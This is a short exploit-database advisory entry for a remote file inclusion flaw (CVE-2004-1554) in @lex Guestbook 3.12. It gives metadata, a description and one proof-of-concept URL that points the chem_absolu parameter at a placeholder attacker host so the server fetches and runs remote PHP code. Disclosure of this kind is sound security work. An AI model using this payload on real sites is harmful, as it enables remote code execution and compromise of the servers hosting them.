@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion

Author: Himeur Nourredine
type: webapps
platform: php
port: 
date_added: 2004-09-27  
date_updated: 2013-03-07  
verified: 1  
codes: CVE-2004-1554;OSVDB-10375  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24638.txt  
source: https://www.securityfocus.com/bid/11260/info

A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data.

Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f